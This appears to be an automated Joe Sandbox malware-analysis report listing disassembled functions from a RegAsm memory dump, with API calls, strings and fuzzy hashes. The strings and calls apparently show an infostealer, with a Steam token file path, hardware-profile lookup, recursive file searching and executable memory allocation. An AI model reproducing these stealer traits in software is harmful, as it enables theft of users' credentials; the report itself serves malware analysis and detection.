Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: J@
API String ID: 3188754299-3016281811
Opcode ID: d8f784d34889ff53bad89def2e75e44130d81317278a711d09a1317144491cd1
Instruction ID: cb1ed88cae5c2bc93b3530c0dbec5c822ac86073251ab52e185eaeaf3754e9f1
Opcode Fuzzy Hash: d8f784d34889ff53bad89def2e75e44130d81317278a711d09a1317144491cd1
Instruction Fuzzy Hash: 57F08271904658ABCB10DF58D901B99B768EB09B34F20476AFC35937D0C73D5A4086C4

Uniqueness

Uniqueness Score: -1.00%

Function 00410D30 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

Unknown, xrefs: 00410D64

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProfilelstrcpy
String ID: Unknown
API String ID: 2831436455-1654365787
Opcode ID: 19b3602f314757e0faabd27852db01908b64834fb2260b4e9b2713c893113fbd
Instruction ID: bd33c02f77d4a78c5fd75930b30a6426299f1aaef28d0e4199fa1c9ffb468557
Opcode Fuzzy Hash: 19b3602f314757e0faabd27852db01908b64834fb2260b4e9b2713c893113fbd
Instruction Fuzzy Hash: 95E09232B0112857CB20AA98EC017EEB3ADDB48615F40017EFD0CD3281DE64591987D9

Uniqueness

Uniqueness Score: -1.00%

Function 19C504D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

failed to allocate %u bytes of memory, xrefs: 19C504E7

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: failed to allocate %u bytes of memory
API String ID: 0-1168259600
Opcode ID: a3b8f23636f971f856af2616dfc1206ea3f903a9ea2423d8572aeefe91168af5
Instruction ID: f376162ddd170b2d61943ef3eada825dd7dc9f9b8d1a01ee08e30fdea6e4d02e
Opcode Fuzzy Hash: a3b8f23636f971f856af2616dfc1206ea3f903a9ea2423d8572aeefe91168af5
Instruction Fuzzy Hash: 82D01266E8C22263D6121290FC01ECB7E515F906A1F4D9034FDCC59360DA55AD9183D2

Uniqueness

Uniqueness Score: -1.00%

Function 004157E0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

lstrlen.KERNEL32(00000000,00000000,?,00000000,0042839F,?,00000000,00422B08,000000FF,?,00418576,?), ref: 00415847

Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041585F

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 2356188485-3507145866
Opcode ID: 93ed9f98140693d4800eedd969e1417f7b0fe10de79906e738de47a47268dbad
Instruction ID: 057213227454b999660eab999351d39f71ae5e0843097ab142fe287d80eba7c3
Opcode Fuzzy Hash: 93ed9f98140693d4800eedd969e1417f7b0fe10de79906e738de47a47268dbad
Instruction Fuzzy Hash: 0B315E71800248EACB15EBA5C906BDDBBB8AB19308F50416EF905736C2DF7C1608CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 19E099D8 Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,19E09AE5,19E5D448,0000000C), ref: 19E09A24
GetFileType.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,19E09AE5,19E5D448,0000000C), ref: 19E09A36

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d03e026bac386220ee159baace07ea8207bc7c272859218ea67938fae3164af3
Instruction ID: 5fc63917affb286c108df6bd551d9a419e42a157aba5ad7a66fc3de32d647281
Opcode Fuzzy Hash: d03e026bac386220ee159baace07ea8207bc7c272859218ea67938fae3164af3
Instruction Fuzzy Hash: 9E11E675B047924AC7304E3ECCE8716BAB8B756374B2D071AE4BB875F1D230D582C640

Uniqueness

Uniqueness Score: -1.00%

Function 00411750 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

Strings

c?A, xrefs: 0041175E

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: c?A
API String ID: 3494564517-3973445457
Opcode ID: d4369522996f46429e2b8f99c10d083dc768b15d27a8655d7000d2a46742015a
Instruction ID: 2f6bf1855c54fdaf0a86b6469ee1b170798d26e677cda476d0f85d276026e230
Opcode Fuzzy Hash: d4369522996f46429e2b8f99c10d083dc768b15d27a8655d7000d2a46742015a
Instruction Fuzzy Hash: 6EF0EC363406151787120F5D98405A7F79EEFD5E50714426BEB68DB3A5D925DC4042E4

Uniqueness

Uniqueness Score: -1.00%

Function 00408080 Relevance: 2.8, APIs: 2, Instructions: 263stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

lstrlen.KERNEL32(00000000), ref: 004082EB
lstrlen.KERNEL32(00000000), ref: 004082FF

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 6e9e9eb8b5b35013eda92946bae44ba3db7cf4b02ddd6fc1e07a456bea934820
Instruction ID: bb0ed716b75b08caa87d0d0c4c5828f057020467c4c4a3a58b00df7d74f44575
Opcode Fuzzy Hash: 6e9e9eb8b5b35013eda92946bae44ba3db7cf4b02ddd6fc1e07a456bea934820
Instruction Fuzzy Hash: 61B18F71800248EACB04EBA5C955BEDBBB8AF19304F14416EF906B3282DF785B08C779

Uniqueness

Uniqueness Score: -1.00%

Function 00417AE0 Relevance: 2.6, APIs: 2, Instructions: 144stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(00000000,00000000), ref: 00417B37
lstrcat.KERNEL32(?,01531AC0), ref: 00417B56

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417838
Part of subcall function 00417800: FindFirstFileA.KERNEL32(?,?), ref: 0041784F

Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
Part of subcall function 00417800: wsprintfA.USER32 ref: 004178DB
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
Part of subcall function 00417800: wsprintfA.USER32 ref: 00417907
Part of subcall function 00417800: PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
Part of subcall function 00417800: lstrcat.KERNEL32(?,0152F608), ref: 00417963
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428720), ref: 00417975
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 00417983
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428724), ref: 00417995
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 004179A9

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417926
Part of subcall function 00417800: FindNextFileA.KERNEL32(000000FF,?), ref: 00417A7A
Part of subcall function 00417800: FindClose.KERNEL32(000000FF), ref: 00417A8C

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 153043497-0
Opcode ID: 2387276b7b8b7c9664f1e86e25683a9f53ba26dbb885212bccb56154d41d0255
Instruction ID: de26392101a7e2bfefa2a23e194a6feb2729e77266eca017e9eca27cf8ee7779
Opcode Fuzzy Hash: 2387276b7b8b7c9664f1e86e25683a9f53ba26dbb885212bccb56154d41d0255
Instruction Fuzzy Hash: CD51AEB1900204ABCB04EF64CC42EEE7779AB49B04F10475EFD4567292DB789B88CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00406630 Relevance: 2.6, APIs: 2, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406AEE), ref: 0040668F
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406AEE), ref: 004066C3

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8e52c199fb5f4c61d9d5a6f440312f4a164c62c567e16456f99efbfb905a6b89
Instruction ID: 9c2575cd9cc3d2590bf8831d886fe8abcf871dfdbc43e53dc684b4ea66081c40
Opcode Fuzzy Hash: 8e52c199fb5f4c61d9d5a6f440312f4a164c62c567e16456f99efbfb905a6b89
Instruction Fuzzy Hash: 9B21B4B13407005BC334CF79DC91FA7BBEAEB80714F144A2EEA5AD63D0D67AA850C658

Uniqueness

Uniqueness Score: -1.00%

Function 00406AA0 Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69b099d378ad8cdfd24c87f9314115fb2290ea22320d676167e748dd43bceb
Instruction ID: 8a5e77b9863af6b226ff7dc5fb5ac28a5c2fe39b41e9eed2e301d918e302b378
Opcode Fuzzy Hash: 0c69b099d378ad8cdfd24c87f9314115fb2290ea22320d676167e748dd43bceb
Instruction Fuzzy Hash: 034180B5E002159BCB14DF59D941AAFB7B8AF54314F11407BE80AE7391E738ED10CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00411D10 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(0041873A,0041873A), ref: 00411D49

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 336d4d8b2dba9eb5ac9ae929dca5d85499c3e2856889d74d340306a8913ab722
Instruction ID: ad82ca9af257c979786628663affac42eb56b3cf1ee156bcd106859eda3eeca6
Opcode Fuzzy Hash: 336d4d8b2dba9eb5ac9ae929dca5d85499c3e2856889d74d340306a8913ab722
Instruction Fuzzy Hash: 22E0A5B0E0421D9BCB40DFE4E40469EBBF4EF48304F40816AD408A6200EB7446458BE9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 19D4D9E0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 564COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19D4DADB, 19D4DE3E
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D4DACC, 19D4DE2F
API called with finalized prepared statement, xrefs: 19D4DAB0, 19D4DE13
misuse, xrefs: 19D4DAD6, 19D4DE39
API called with NULL prepared statement, xrefs: 19D4DA9B, 19D4DDFE

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: c25b37597360f631e3f3c3568ce3753cf69bc968525628e5b5d839ad282dd77e
Instruction ID: 8c2e10c8011b0706b904f87723d0499c3b30f7b10b055f47723bcf1b6e41eec6
Opcode Fuzzy Hash: c25b37597360f631e3f3c3568ce3753cf69bc968525628e5b5d839ad282dd77e
Instruction Fuzzy Hash: C712F1B09047419BE7208F24DC45B577BE8AF45358F2C452CE89A9BF82E776F405CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C4B400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 367COMMON

Download Yara Rule

Strings

SELECT %s ORDER BY rowid %s, xrefs: 19C4B665
SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s, xrefs: 19C4B696
DESC, xrefs: 19C4B656, 19C4B65E, 19C4B67D, 19C4B685
ASC, xrefs: 19C4B651, 19C4B678

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
API String ID: 0-3496276579
Opcode ID: c479fdee10fc2f618d4f3918f7a4013e01ed0289b272edc4d4331822e07c9ea5
Instruction ID: cb63b12320aceb29b6fbdc76240a63a05c9f458f6f07c8d68ee1ca48352bf725
Opcode Fuzzy Hash: c479fdee10fc2f618d4f3918f7a4013e01ed0289b272edc4d4331822e07c9ea5
Instruction Fuzzy Hash: 68C136766007419FC7118F25E84176BB7E4FF84310F68492EE8CA8B681EB36F555CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 19C9DB10 Relevance: 18.3, APIs: 12, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32c11dc7f1337e79cd0f1ae30dcf22ed82da635ca7877d7bf3dd6fdc8eb9d304
Instruction ID: 89f3607126996c884311b7ad5157d1aad06ad6cf57992b3e9cafaffb1ccf2050
Opcode Fuzzy Hash: 32c11dc7f1337e79cd0f1ae30dcf22ed82da635ca7877d7bf3dd6fdc8eb9d304
Instruction Fuzzy Hash: B081D276614301AFE710DF68EC80B6BB3E9EF84714F48182CF9C5A7250EB75E91587A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C50FB0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

e, xrefs: 19C5115A

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

